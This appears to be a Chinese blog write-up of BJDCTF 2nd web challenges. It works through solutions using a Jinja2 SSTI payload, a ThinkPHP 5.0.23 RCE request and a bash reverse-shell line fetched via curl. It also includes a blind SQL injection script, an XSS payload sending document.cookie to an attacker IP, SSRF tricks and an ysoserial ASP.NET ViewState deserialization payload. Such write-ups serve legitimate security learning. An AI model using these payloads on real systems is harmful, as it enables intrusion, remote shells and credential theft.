BJDCTF 2nd WEB
2024-05-19 10:23:06
BJDCTF 2nd WEB
emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,,
[BJDCTF 2nd]fake google
一个SSTI,发现是jinja2的,直接用payload打就行:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()") }}
{% endif %}
{% endfor %}
get:
[BJDCTF 2nd]old-hack
可以看见有提示thinkphp5,直接用5.0的payload打,会提示有错误
但是可以看见版本:thinkphp 5.0.23,那用 5.0.23payload就行了
payload:
POST /?s=captcha_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag&method=get
get:
[BJDCTF 2nd]duangShell
题目进去有提示.swp,下载备份文件.index.php.swp,下载下来使用命令:vim -r .index.php.swp恢复
得到源码:
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><title>give me a girl</title>
</head>
<body><center><h1>珍爱网</h1></center>
</body>
</html>
<?php
error_reporting(0);
echo "how can i give you source code? .swp?!"."<br>";
if (!isset($_POST['girl_friend'])) {die("where is P3rh4ps's girl friend ???");
} else {$girl = $_POST['girl_friend'];if (preg_match('/\>|\\\/', $girl)) {die('just girl');} else if (preg_match('/ls|phpinfo|cat|\%|\^|\~|base64|xxd|echo|\$/i', $girl)) {echo "<img src='img/p3_need_beautiful_gf.png'> <!-- He is p3 -->";} else {//duangShell~~~~exec($girl);}
}
可以看见这里过滤了很多东西,写shell是不可能了,只能反弹shell和duang是不是有差不多的意思
可以使用curl这个命令,由于不能访问外网我们需开一台内网虚拟机,注册个小号,,,
在虚拟机的/var/www/html中创建一个文件:shell.txt
写入:bash -i >& /dev/tcp/[ip]/[port] 0>&1
然后去命令执行:
成功反弹shell,根目录下是假的,查找flag:
得到flag:
[BJDCTF 2nd]简单注入
看样子就是注入,应该要我们注出密码
先跑一下过滤了啥,发现and、&&、like、=、select、;、引号和双引号等过滤了很多
看到select被过滤了,应该是盲注,猜测存在password表
由于引号被过滤,所以我们可以使得username=admin\&password=or 1#
发现回显不同,,,,,
不过我使用的是时间盲注,脚本:
import requests
import sys
import string
import io
import timesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf8') #改变标准输出的默认编码,否则s.text不能输出
flag = ""
x = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"url = "http://4c5924a8-6e62-42fb-afad-e83fd4986c79.node3.buuoj.cn/"payload={"username":"admin\\","password":""
}start_time = time.time()
#r=requests.post(url=url,data=payload)
#if(time.time() - start_time > 4):#print("yes")
#print(r.text)for i in range(1,33):for j in range(32,126):payload['password'] = "or if(ascii(substr(password,%s,1))>%s,sleep(2),1)#"%(str(i),j)#print(payload)start_time = time.time()r = requests.post(url=url,data=payload)if(time.time() - start_time < 2):flag += chr(j)print(flag)break
可以得到密码,登陆拿到flag:
[BJDCTF 2nd]假猪套天下第一
这个题应该算是简单的吧,发现页面存在hint:
访问发现:
抓包看见cookie中存在time,修改成大一些的:
只允许本地访问,发现XFF不行,官方放出的hint是含X的都不行,,,,事实证明官方hint有问题
Client-IP: 127.0.0.1和X-Real-IP: 127.0.0.1都行:
增加referer:gem-love.com
得到:
修改UA:
根据hint,搜索一波,可以得到commodo 64全称Commodore 64,修改得到:
添加:from: root@gem-love.com,得到:
添加:via: y1ng.vip,得到:
发现base64字符串,进行解密,拿到flag:
[BJDCTF 2nd]Schrödinger
有个白色字体的hint:
进行访问:
登陆页面,没发现啥东西,返回到原来网页发现是个爆破登陆的
输入:http://a50183b8-4db6-4c7f-8053-8ce20bd9c135.node3.buuoj.cn/test.php
发现爆破很慢,抓包查看发现有个cookie是base64加密:
进行解密:
很像时间戳,直接清空看看效果,发现直接99%,点击check,,,
根据官方hint,B站,,,,,av号,,看评论拿到flag,脑洞大开,,,,,:
[BJDCTF 2nd]xss之光
一进入页面就是gungungun,,,,,查看敏感目录,,发现存在git泄露
直接down下源码:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
如此简单的源码如何进行xss????
反序列化是不可能的,,,一个类都没有,只能对原生类进行反序列化,,,
结合题目名字,原生类的xss,,,搜索了一波~~
有__call和__toString,这里有个echo,应该是包含__toString的,那我们可以使用Error和Exception类
直接用Exception,因为Error只适用于php7,,,
先试一试:
<?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?>
然后再返回来的cookie中就看见了flag,,,,,,,,,
都不用开内网虚拟机的嘛,,,,,:
[BJDCTF 2nd]elementmaster
这道题目可谓是脑洞大开了,,,,,
进去是一张图片,查看源码,id有古怪:
16进制解码得到:Po.php
访问啥都没有,根据放出的hint,说与元素周期表有关,,,,
看文件名就是元素名,所以要遍历元素周期表,,,,(自闭,这谁想得到)
脚本:
import requests
import sys
import string
import io
import timesys.stdout = io.TextIOWrapper(sys.stdout.buffer,encoding='utf8') #改变标准输出的默认编码,否则s.text不能输出
flag = ""url = "http://a1a59511-3d71-49ce-80d7-55c3ae072645.node3.buuoj.cn/%s.php"
f = open("1.txt",'r').read().split('\n')
#print(f)for i in f:urls = url%(i)#print(urls)r = requests.get(urls)if r.status_code == 200:print(r.text,end="")得到:
访问:
同样的脑洞大开题,,,,,,
[BJDCTF 2nd]文件探测
花里胡哨的页面,,,,查看源码:
什么东西,,,,与第一届BJDCTF有关???无果
直接抓包,发现hint:
访问:
怀疑还有别的文件,,,最后发现admin.php
看官方hint是SSRF,,,,猜也是ssrf,,返回,看见:
尝试是否存在文件包含,,,,读取system.php的源码:
<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";header("Refresh:0.1;url=index.php");die;
}$str2 = ' Error: url invalid<br>~$ ';
$str3 = ' Error: damn hacker!<br>~$ ';
$str4 = ' Error: request method error<br>~$ ';?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>File Detector</title><link rel="stylesheet" type="text/css" href="css/normalize.css" /><link rel="stylesheet" type="text/css" href="css/demo.css" /><link rel="stylesheet" type="text/css" href="css/component.css" /><script src="js/modernizr.custom.js"></script></head>
<body>
<section><form id="theForm" class="simform" autocomplete="off" action="system.php" method="post"><div class="simform-inner"><span><p><center>File Detector</center></p></span><ol class="questions"><li><span><label for="q1">ä½ çŸ¥é“目录下都有什么文件å—?</label></span><input id="q1" name="q1" type="text"/></li><li><span><label for="q2">请输å
¥ä½ 想检测文件å†
容长度的url</label></span><input id="q2" name="q2" type="text"/></li><li><span><label for="q1">ä½ å¸Œæœ›ä»¥ä½•ç§æ–¹å¼è®¿é—®ï¼ŸGET?POST?</label></span><input id="q3" name="q3" type="text"/></li></ol><button class="submit" type="submit" value="submit">æ交</button><div class="controls"><button class="next"></button><div class="progress"></div><span class="number"><span class="number-current"></span><span class="number-total"></span></span><span class="error-message"></span></div></div><span class="final-message"></span></form><span><p><center><a href="https://gem-love.com" target="_blank">@颖奇L'Amore</a></center></p></span>
</section><script type="text/javascript" src="js/classie.js"></script>
<script type="text/javascript" src="js/stepsForm.js"></script>
<script type="text/javascript">var theForm = document.getElementById( 'theForm' );new stepsForm( theForm, {onSubmit : function( form ) {classie.addClass( theForm.querySelector( '.simform-inner' ), 'hide' );var messageEl = theForm.querySelector( '.final-message' );form.submit();messageEl.innerHTML = 'Ok...Let me have a check';classie.addClass( messageEl, 'show' );}} );
</script></body>
</html>
<?php$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {$url = $_POST['q2'].".y1ng.txt";$method = $_POST['q3'];$str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";echo $str1;if (!preg_match($filter1, $url) ){die($str2);}if (preg_match($filter2, $url)) {die($str3);}if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {die($str4);}$detect = @file_get_contents($url, false);print(sprintf("$url method&content_size:$method%d", $detect));
}
?>
读取home.php源码:
<?phpsetcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);if(isset($_GET['file'])){if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {die("forbidden");}if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){die("not now!");}if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){die("You! are! not! my! admin!");}if(preg_match("/^home$/i", $_GET['file'])){die("ç¦æ¢å¥—娃");}else{if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){$file = $_GET['file'].".php";}else{$file = $_GET['file'].".fxxkyou!";}echo "现在访问的是 ".$file . "<br>";require $file;}
} else {echo "<script>location.href='./home.php?file=system'</script>";
}
无法读取admin.php内容:
system.php代码审计:
与极客大挑战中的SSRF差不多的方法读取文件内容,,,,
直接进行构造,q1=a&q2=http://127.0.0.1/admin.php?x=1&q3=GET%s%
得到admin.php源码:
<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fakefunction aesEn($data, $key)
{$method = 'AES-128-CBC';$iv = md5($_SERVER['REMOTE_ADDR'],true);return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}function Check()
{if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))return true;elsereturn false;
}if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {highlight_file(__FILE__);
} else {echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);if (isset($_GET['decrypt'])) {$decr = $_GET['decrypt'];if (Check()){$data = $_SESSION['secret'];include 'flag_2sln2ndln2klnlksnf.php';$cipher = aesEn($data, 'y1ng');if ($decr === $cipher){echo WHAT_YOU_WANT;} else {die('爬');}} else{header("Refresh:0.1;url=index.php");}
} else {//I heard you can break PHP mt_rand seedmt_srand(rand(0,9999999));$length = mt_rand(40,80);$_SESSION['secret'] = bin2hex(random_bytes($length));
}?>
分析一波:
根据分析,写解密脚本:
<?php
function aesEn($data, $key)
{$method = 'AES-128-CBC';$iv = md5('174.0.222.75', true);return base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}$cipher = aesEn('', 'y1ng');
echo urlencode($cipher);
?>
得到flag:
[BJDCTF 2nd]EasyAspDotNet
这应该是个重头戏吧,,,,进入页面发现:
怀疑存在文件包含,而且hint是web.config所以尝试读取,发现没有显示,是图片的样式,,,
无法另存为,,,,使用curl,,,得到源码:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<machineKey validationKey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9" decryptionKey="B0E528C949E59127E7469C9AF0764506BAFD2AB8150A75A5" validation="SHA1" decryption="3DES" />
</system.web>
</configuration>
讲真,到这里我真不知道该如何了,,,,
看师傅博客上的两篇文章:
如何借助ViewState在ASP.NET中实现反序列化漏洞利用
玩轉 ASP.NET VIEWSTATE 反序列化攻擊、建立無檔案後門
根据web.config,我们可以得知validationKey,这样我们就可以自己算__VIEWSTATE了
收集:
validationkey、validationalg、generator
直接利用payload:
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./System.dll;./System.Web.dll" --generator="CA0B0334" --validationalg="SHA1" --validationkey="47A7D23AF52BEF07FB9EE7BD395CD9E19937682ECB288913CE758DE5035CF40DC4DB2B08479BF630CFEAF0BDFEE7242FC54D89745F7AF77790A4B5855A08EAC9
得到:
/wEy7EoAAQAAAP8BAAAAAAAAAAwCAAAATlN5c3RlbS5EYXRhLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAE1N5c3RlbS5EYXRhLkRhdGFTZXQKAAAAFkRhdGFTZXQuUmVtb3RpbmdGb3JtYXQTRGF0YVNldC5EYXRhU2V0TmFtZRFEYXRhU2V0Lk5hbWVzcGFjZQ5EYXRhU2V0LlByZWZpeBVEYXRhU2V0LkNhc2VTZW5zaXRpdmUSRGF0YVNldC5Mb2NhbGVMQ0lEGkRhdGFTZXQuRW5mb3JjZUNvbnN0cmFpbnRzGkRhdGFTZXQuRXh0ZW5kZWRQcm9wZXJ0aWVzFERhdGFTZXQuVGFibGVzLkNvdW50EERhdGFTZXQuVGFibGVzXzAEAQEBAAAAAgAHH1N5c3RlbS5EYXRhLlNlcmlhbGl6YXRpb25Gb3JtYXQCAAAAAQgBCAICAAAABf3///8fU3lzdGVtLkRhdGEuU2VyaWFsaXphdGlvbkZvcm1hdAEAAAAHdmFsdWVfXwAIAgAAAAEAAAAGBAAAAAAJBAAAAAkEAAAAAAkEAAAACgEAAAAJBQAAAA8FAAAAfCMAAAIAAQAAAP8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAHAAAABwAAABACAAAACAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACgwKAAAAYVN5c3RlbS5Xb3JrZmxvdy5Db21wb25lbnRNb2RlbCwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAwAAAGpTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwuU2VyaWFsaXphdGlvbi5BY3Rpdml0eVN1cnJvZ2F0ZVNlbGVjdG9yK09iamVjdFN1cnJvZ2F0ZStPYmplY3RTZXJpYWxpemVkUmVmAgAAAAR0eXBlC21lbWJlckRhdGFzAwUfU3lzdGVtLlVuaXR5U2VyaWFsaXphdGlvbkhvbGRlcgoAAAAJCwAAAAkMAAAAAQQAAAADAAAACQ0AAAAJDgAAAAEFAAAAAwAAAAkPAAAACRAAAAABBgAAAAMAAAAJEQAAAAkSAAAAAQcAAAADAAAACRMAAAAJFAAAAAEIAAAAAwAAAAkVAAAACRYAAAAECQAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg/AgAAAAoKAwAAAAkXAAAACRgAAAAECwAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEIBhkAAAD4AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RMaXN0SXRlcmF0b3JgMltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHksIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAYaAAAATlN5c3RlbS5Db3JlLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORAMAAAABwAAAAkbAAAACgkcAAAACR0AAAAICAAAAAAKCAgBAAAAAQ0AAAALAAAABh4AAAD4AVN5c3RlbS5MaW5xLkVudW1lcmFibGUrPFNlbGVjdE1hbnlJdGVyYXRvcj5kX18xN2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkaAAAAEA4AAAAJAAAACAj+CggIAQAAAAoJAwAAAAoJIQAAAA0CAQ8AAAALAAAABiIAAADvAVN5c3RlbS5MaW5xLkVudW1lcmFibGUrV2hlcmVTZWxlY3RFbnVtZXJhYmxlSXRlcmF0b3JgMltbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAkaAAAAEBAAAAAHAAAACQQAAAAKCSUAAAAKCAgAAAAACggIAQAAAAERAAAACwAAAAYmAAAAKVN5c3RlbS5XZWIuVUkuV2ViQ29udHJvbHMuUGFnZWREYXRhU291cmNlBAAAAAYnAAAATVN5c3RlbS5XZWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iMDNmNWY3ZjExZDUwYTNhEBIAAAAHAAAACQUAAAAICAAAAAAICAoAAAAIAQAIAQAIAQAICAAAAAABEwAAAAsAAAAGKQAAAClTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkRlc2lnbmVyVmVyYgQAAAAGKgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5EBQAAAAFAAAADQIJKwAAAAgIAwAAAAkIAAAAARUAAAALAAAABi0AAAA0U3lzdGVtLlJ1bnRpbWUuUmVtb3RpbmcuQ2hhbm5lbHMuQWdncmVnYXRlRGljdGlvbmFyeQQAAAAGLgAAAEttc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkQFgAAAAEAAAAJBgAAABAXAAAAAgAAAAkHAAAACQcAAAAQGAAAAAIAAAAGMQAAAAAJMQAAAAQbAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgMAAA9TeXN0ZW0uQnl0ZVtdW10ICAkyAAAAAQAAAAEAAAAEHAAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAgAAAAhEZWxlZ2F0ZQdtZXRob2QwAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCTMAAAAJNAAAAAQdAAAAigFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDErRW51bWVyYXRvcltbU3lzdGVtLkJ5dGVbXSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAABGxpc3QFaW5kZXgHdmVyc2lvbgdjdXJyZW50AwAAB39TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCAgCCgAAAAAAAAAACgEhAAAAHAAAAAk1AAAACTYAAAABJQAAABwAAAAJNwAAAAk4AAAAASsAAAADAAAACTkAAAAJOgAAAAcyAAAAAQEAAAAEAAAABwIJOwAAAAoKCgQzAAAAMFN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQcAAAAEdHlwZQhhc3NlbWJseQZ0YXJnZXQSdGFyZ2V0VHlwZUFzc2VtYmx5DnRhcmdldFR5cGVOYW1lCm1ldGhvZE5hbWUNZGVsZWdhdGVFbnRyeQEBAgEBAQMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BjwAAADVAVN5c3RlbS5GdW5jYDJbW1N5c3RlbS5CeXRlW10sIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkuAAAACgkuAAAABj4AAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkGPwAAAARMb2FkCgQ0AAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyBwAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlClNpZ25hdHVyZTIKTWVtYmVyVHlwZRBHZW5lcmljQXJndW1lbnRzAQEBAQEAAwgNU3lzdGVtLlR5cGVbXQk/AAAACS4AAAAJPgAAAAZCAAAAJ1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQZDAAAALlN5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5IExvYWQoU3lzdGVtLkJ5dGVbXSkIAAAACgE1AAAAMwAAAAZEAAAAzAJTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuSUVudW1lcmFibGVgMVtbU3lzdGVtLlR5cGUsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQkuAAAACgkuAAAACT4AAAAGRwAAAAhHZXRUeXBlcwoBNgAAADQAAAAJRwAAAAkuAAAACT4AAAAGSgAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkGSwAAABhTeXN0ZW0uVHlwZVtdIEdldFR5cGVzKCkIAAAACgE3AAAAMwAAAAZMAAAAxgFTeXN0ZW0uRnVuY2AyW1tTeXN0ZW0uVHlwZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JLgAAAAoJLgAAAAZOAAAAEFN5c3RlbS5BY3RpdmF0b3IGTwAAAA5DcmVhdGVJbnN0YW5jZQoBOAAAADQAAAAJTwAAAAkuAAAACU4AAAAGUgAAAClTeXN0ZW0uT2JqZWN0IENyZWF0ZUluc3RhbmNlKFN5c3RlbS5UeXBlKQZTAAAAKVN5c3RlbS5PYmplY3QgQ3JlYXRlSW5zdGFuY2UoU3lzdGVtLlR5cGUpCAAAAAoBOQAAAAsAAAAGVAAAACZTeXN0ZW0uQ29tcG9uZW50TW9kZWwuRGVzaWduLkNvbW1hbmRJRAQAAAAJKgAAABA6AAAAAgAAAAlWAAAACAgAIAAADzsAAAAAEAAAAk1akAADAAAABAAAAP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEUAAEwBAwDS43ZeAAAAAAAAAADgAAIhCwELAAAIAAAABgAAAAAAAN4mAAAAIAAAAEAAAAAAABAAIAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAgAAAAAIAAAAAAAADAECFAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAACMJgAATwAAAABAAACoAgAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAgAAAAAAAAAAAAAAAggAABIAAAAAAAAAAAAAAAudGV4dAAAAOQGAAAAIAAAAAgAAAACAAAAAAAAAAAAAAAAAAAgAABgLnJzcmMAAACoAgAAAEAAAAAEAAAACgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAADAAAAABgAAAAAgAAAA4AAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAwCYAAAAAAABIAAAAAgAFADAhAABcBQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbMAMAwwAAAAEAABECKAMAAAooBAAACgoGbwUAAApvBgAACgZvBwAACm8IAAAKcwkAAAoLB28KAAAKcgEAAHBvCwAACgZvDAAACm8NAAAKchEAAHBvDgAACgwHbwoAAApyGQAAcAgoDwAACm8QAAAKB28KAAAKF28RAAAKB28KAAAKF28SAAAKB28KAAAKFm8TAAAKB28UAAAKJgdvFQAACm8WAAAKDQZvBwAACglvFwAACt4DJt4ABm8HAAAKbxgAAAoGbwcAAApvGQAACioAARAAAAAAIgCHqQADDgAAAUJTSkIBAAEAAAAAAAwAAAB2NC4wLjMwMzE5AAAAAAUAbAAAALwBAAAjfgAAKAIAAHACAAAjU3RyaW5ncwAAAACYBAAAJAAAACNVUwC8BAAAEAAAACNHVUlEAAAAzAQAAJAAAAAjQmxvYgAAAAAAAAACAAABRxQCAAkAAAAA+iUzABYAAAEAAAAOAAAAAgAAAAEAAAAZAAAAAgAAAAEAAAABAAAAAwAAAAAACgABAAAAAAAGACkAIgAGAFYANgAGAHYANgAKAKgAnQAKAMAAnQAKAOgAnQAOABsBCAEOACMBCAEKAE8BnQAOAIYBZwEGAKwBIgAGACECFwIGAEECFwIGAGYCIgAAAAAAAQAAAAAAAQABAAAAEAAXAAAABQABAAEAUCAAAAAAhhgwAAoAAQARADAADgAZADAACgAJADAACgAhALQAHAAhANIAIQApAN0ACgAhAPUAJgAxAAIBCgA5ADAACgA5ADQBKwBBAEIBMAAhAFsBNQBJAJoBOgBRAKMBPwBZALMBRABBALoBMABBAMgBSgBBAOMBSgBBAP0BSgA5ABECTwA5AC4CUwBpAEwCWAAxAFYCMAAxAFwCCgAxAGICCgAuAAsAZQAuABMAbgBcAASAAAAAAAAAAAAAAAAAAAAAAJQAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAA